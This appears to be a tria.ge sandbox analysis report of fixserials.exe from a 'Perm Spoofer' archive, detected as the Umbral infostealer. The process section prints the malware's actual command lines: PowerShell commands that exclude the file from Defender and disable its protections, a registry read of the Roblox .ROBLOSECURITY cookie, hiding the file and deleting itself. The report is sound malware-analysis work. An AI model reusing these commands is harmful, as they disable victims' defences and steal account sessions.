Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
10Perm Spoof...er.exe
windows11-21h2-x64
1Perm Spoof...on.dll
windows11-21h2-x64
1Perm Spoof...ec.dll
windows11-21h2-x64
1Perm Spoofer/bz2.dll
windows11-21h2-x64
1Perm Spoof...ed.exe
windows11-21h2-x64
1Perm Spoof...F2.bat
windows11-21h2-x64
5Perm Spoof...ck.exe
windows11-21h2-x64
1Perm Spoof...hk.sys
windows11-21h2-x64
1Perm Spoof...DF.bat
windows11-21h2-x64
1Perm Spoof...64.dll
windows11-21h2-x64
1Perm Spoof...64.dll
windows11-21h2-x64
1Perm Spoof...64.dll
windows11-21h2-x64
1Perm Spoof...sk.bat
windows11-21h2-x64
6Perm Spoof...ls.exe
windows11-21h2-x64
10Perm Spoof...4e.sys
windows11-21h2-x64
1Perm Spoof...ac.bat
windows11-21h2-x64
1Perm Spoof...ss.exe
windows11-21h2-x64
1Perm Spoof...64.exe
windows11-21h2-x64
1Perm Spoof...64.sys
windows11-21h2-x64
1Perm Spoof...pe.dll
windows11-21h2-x64
1Perm Spoof...16.dll
windows11-21h2-x64
1Perm Spoof...ed.exe
windows11-21h2-x64
1Perm Spoof...b1.dll
windows11-21h2-x64
1Resubmissions
13/11/2024, 20:39
241113-zfjhksygpp 10Analysis
-
max time kernel
91s -
max time network
101s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
13/11/2024, 20:39
Behavioral task
behavioral1
Sample
Perm Spoofer/Perm Spoofer.exe
Resource
win11-20241023-en
Behavioral task
behavioral2
Sample
Perm Spoofer/brotlicommon.dll
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
Perm Spoofer/brotlidec.dll
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
Perm Spoofer/bz2.dll
Resource
win11-20241007-en
Behavioral task
behavioral5
Sample
Perm Spoofer/cracked.exe
Resource
win11-20241007-en
Behavioral task
behavioral6
Sample
Perm Spoofer/dumped files/ASUSPDF2.bat
Resource
win11-20241007-en
Behavioral task
behavioral7
Sample
Perm Spoofer/dumped files/AsDeviceCheck.exe
Resource
win11-20241007-en
Behavioral task
behavioral8
Sample
Perm Spoofer/dumped files/AsDeviceChk.sys
Resource
win11-20241007-en
Behavioral task
behavioral9
Sample
Perm Spoofer/dumped files/AsusPDF.bat
Resource
win11-20241007-en
Behavioral task
behavioral10
Sample
Perm Spoofer/dumped files/afuefix64.dll
Resource
win11-20241007-en
Behavioral task
behavioral11
Sample
Perm Spoofer/dumped files/amideefix64.dll
Resource
win11-20241007-en
Behavioral task
behavioral12
Sample
Perm Spoofer/dumped files/bootx64.dll
Resource
win11-20241007-en
Behavioral task
behavioral13
Sample
Perm Spoofer/dumped files/disk.bat
Resource
win11-20241007-en
Behavioral task
behavioral14
Sample
Perm Spoofer/dumped files/fixserials.exe
Resource
win11-20241007-en
Behavioral task
behavioral15
Sample
Perm Spoofer/dumped files/iqvw64e.sys
Resource
win11-20241007-en
Behavioral task
behavioral16
Sample
Perm Spoofer/dumped files/mac.bat
Resource
win11-20241023-en
Behavioral task
behavioral17
Sample
Perm Spoofer/dumped files/tpmbypass.exe
Resource
win11-20241007-en
Behavioral task
behavioral18
Sample
Perm Spoofer/dumped files/winxsrcsv64.exe
Resource
win11-20241007-en
Behavioral task
behavioral19
Sample
Perm Spoofer/dumped files/winxsrcsv64.sys
Resource
win11-20241007-en
Behavioral task
behavioral20
Sample
Perm Spoofer/freetype.dll
Resource
win11-20241007-en
Behavioral task
behavioral21
Sample
Perm Spoofer/libpng16.dll
Resource
win11-20241007-en
Behavioral task
behavioral22
Sample
Perm Spoofer/non cracked.exe
Resource
win11-20241007-en
Behavioral task
behavioral23
Sample
Perm Spoofer/zlib1.dll
Resource
win11-20241007-en
General
-
Target
Perm Spoofer/dumped files/fixserials.exe
-
Size
229KB
-
MD5
9252505656ab18c34d4ecff6a7f86263
-
SHA1
dfa01cbe5c99fbf67a5063f99c67669382e43356
-
SHA256
78da8433390c0aaf2e5f748ff266bacad23fe9d05b1834eabceeb6ad69859589
-
SHA512
5e270de9982c3137c16e32fa4c88f9a414893c623fbcdd5cb2f3ff9bbf82eac82bb8d01100d60ea8633da875b36df39d657a9090e393d4fdf717575821bce8a5
-
SSDEEP
6144:lloZMcrIkd8g+EtXHkv/iD4l6qZEKtFu9r20VJgU8b8e1mbDi:noZrL+EP8l6qZEKtFu9r20VJgZd
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral14/memory/440-1-0x0000021747890000-0x00000217478D0000-memory.dmp family_umbral -
Umbral family
-
pid Process 732 powershell.exe 2232 powershell.exe 972 powershell.exe 2564 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 7 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1856 cmd.exe 3152 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1620 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3152 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 440 fixserials.exe 2564 powershell.exe 2564 powershell.exe 732 powershell.exe 732 powershell.exe 2232 powershell.exe 2232 powershell.exe 996 powershell.exe 996 powershell.exe 972 powershell.exe 972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 440 fixserials.exe Token: SeIncreaseQuotaPrivilege 4508 wmic.exe Token: SeSecurityPrivilege 4508 wmic.exe Token: SeTakeOwnershipPrivilege 4508 wmic.exe Token: SeLoadDriverPrivilege 4508 wmic.exe Token: SeSystemProfilePrivilege 4508 wmic.exe Token: SeSystemtimePrivilege 4508 wmic.exe Token: SeProfSingleProcessPrivilege 4508 wmic.exe Token: SeIncBasePriorityPrivilege 4508 wmic.exe Token: SeCreatePagefilePrivilege 4508 wmic.exe Token: SeBackupPrivilege 4508 wmic.exe Token: SeRestorePrivilege 4508 wmic.exe Token: SeShutdownPrivilege 4508 wmic.exe Token: SeDebugPrivilege 4508 wmic.exe Token: SeSystemEnvironmentPrivilege 4508 wmic.exe Token: SeRemoteShutdownPrivilege 4508 wmic.exe Token: SeUndockPrivilege 4508 wmic.exe Token: SeManageVolumePrivilege 4508 wmic.exe Token: 33 4508 wmic.exe Token: 34 4508 wmic.exe Token: 35 4508 wmic.exe Token: 36 4508 wmic.exe Token: SeIncreaseQuotaPrivilege 4508 wmic.exe Token: SeSecurityPrivilege 4508 wmic.exe Token: SeTakeOwnershipPrivilege 4508 wmic.exe Token: SeLoadDriverPrivilege 4508 wmic.exe Token: SeSystemProfilePrivilege 4508 wmic.exe Token: SeSystemtimePrivilege 4508 wmic.exe Token: SeProfSingleProcessPrivilege 4508 wmic.exe Token: SeIncBasePriorityPrivilege 4508 wmic.exe Token: SeCreatePagefilePrivilege 4508 wmic.exe Token: SeBackupPrivilege 4508 wmic.exe Token: SeRestorePrivilege 4508 wmic.exe Token: SeShutdownPrivilege 4508 wmic.exe Token: SeDebugPrivilege 4508 wmic.exe Token: SeSystemEnvironmentPrivilege 4508 wmic.exe Token: SeRemoteShutdownPrivilege 4508 wmic.exe Token: SeUndockPrivilege 4508 wmic.exe Token: SeManageVolumePrivilege 4508 wmic.exe Token: 33 4508 wmic.exe Token: 34 4508 wmic.exe Token: 35 4508 wmic.exe Token: 36 4508 wmic.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeIncreaseQuotaPrivilege 1552 wmic.exe Token: SeSecurityPrivilege 1552 wmic.exe Token: SeTakeOwnershipPrivilege 1552 wmic.exe Token: SeLoadDriverPrivilege 1552 wmic.exe Token: SeSystemProfilePrivilege 1552 wmic.exe Token: SeSystemtimePrivilege 1552 wmic.exe Token: SeProfSingleProcessPrivilege 1552 wmic.exe Token: SeIncBasePriorityPrivilege 1552 wmic.exe Token: SeCreatePagefilePrivilege 1552 wmic.exe Token: SeBackupPrivilege 1552 wmic.exe Token: SeRestorePrivilege 1552 wmic.exe Token: SeShutdownPrivilege 1552 wmic.exe Token: SeDebugPrivilege 1552 wmic.exe Token: SeSystemEnvironmentPrivilege 1552 wmic.exe Token: SeRemoteShutdownPrivilege 1552 wmic.exe Token: SeUndockPrivilege 1552 wmic.exe Token: SeManageVolumePrivilege 1552 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 440 wrote to memory of 4508 440 fixserials.exe 80 PID 440 wrote to memory of 4508 440 fixserials.exe 80 PID 440 wrote to memory of 3004 440 fixserials.exe 83 PID 440 wrote to memory of 3004 440 fixserials.exe 83 PID 440 wrote to memory of 2564 440 fixserials.exe 85 PID 440 wrote to memory of 2564 440 fixserials.exe 85 PID 440 wrote to memory of 732 440 fixserials.exe 87 PID 440 wrote to memory of 732 440 fixserials.exe 87 PID 440 wrote to memory of 2232 440 fixserials.exe 89 PID 440 wrote to memory of 2232 440 fixserials.exe 89 PID 440 wrote to memory of 996 440 fixserials.exe 91 PID 440 wrote to memory of 996 440 fixserials.exe 91 PID 440 wrote to memory of 1552 440 fixserials.exe 93 PID 440 wrote to memory of 1552 440 fixserials.exe 93 PID 440 wrote to memory of 8 440 fixserials.exe 95 PID 440 wrote to memory of 8 440 fixserials.exe 95 PID 440 wrote to memory of 1648 440 fixserials.exe 97 PID 440 wrote to memory of 1648 440 fixserials.exe 97 PID 440 wrote to memory of 972 440 fixserials.exe 99 PID 440 wrote to memory of 972 440 fixserials.exe 99 PID 440 wrote to memory of 1620 440 fixserials.exe 101 PID 440 wrote to memory of 1620 440 fixserials.exe 101 PID 440 wrote to memory of 1856 440 fixserials.exe 103 PID 440 wrote to memory of 1856 440 fixserials.exe 103 PID 1856 wrote to memory of 3152 1856 cmd.exe 105 PID 1856 wrote to memory of 3152 1856 cmd.exe 105 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3004 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Perm Spoofer\dumped files\fixserials.exe"C:\Users\Admin\AppData\Local\Temp\Perm Spoofer\dumped files\fixserials.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Perm Spoofer\dumped files\fixserials.exe"2⤵
- Views/modifies file attributes
PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Perm Spoofer\dumped files\fixserials.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:8
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:972
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1620
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Perm Spoofer\dumped files\fixserials.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3152
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
948B
MD5441a842138038e6385e430a90d7ea608
SHA17b3712d2cdd37e10ee9b3994131ee5175e920f01
SHA25647592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c
SHA5129dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666
-
Filesize
1KB
MD5cd5b2555a0e703bc746e242654a09c2f
SHA14021bfba22c0fce16709bfa6140d11272b7bd8b4
SHA25673679042b477828c6c8400590ca1434f5f6b7379aede1442f80bb9ede3bc7811
SHA512404a94bbc1cbcf98dba90160ab65a8acc5a1660d801bf7425ab1fe641599bda1b6494d4d6b65c6584e4ca6c1dea4b1acfde88e4a6d216194dca3b6ae6ca605f1
-
Filesize
1KB
MD59cdc6124fadc469d2a74bfdbc5bf9285
SHA1555fcdac2d239ad1c892bbe3fc40b924a602027d
SHA256e5bcbfd44bb017062d5aef3bf748528513f703a468413420f3fbf8d247e5e4af
SHA51259f1c423d2c6bcba2731489a70299207b4dfe34ce6e812d238d385c504ec96c38ecc546256e23a2dc54ff114abc122c1c5095d7280172bd69b40f07592febf1e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82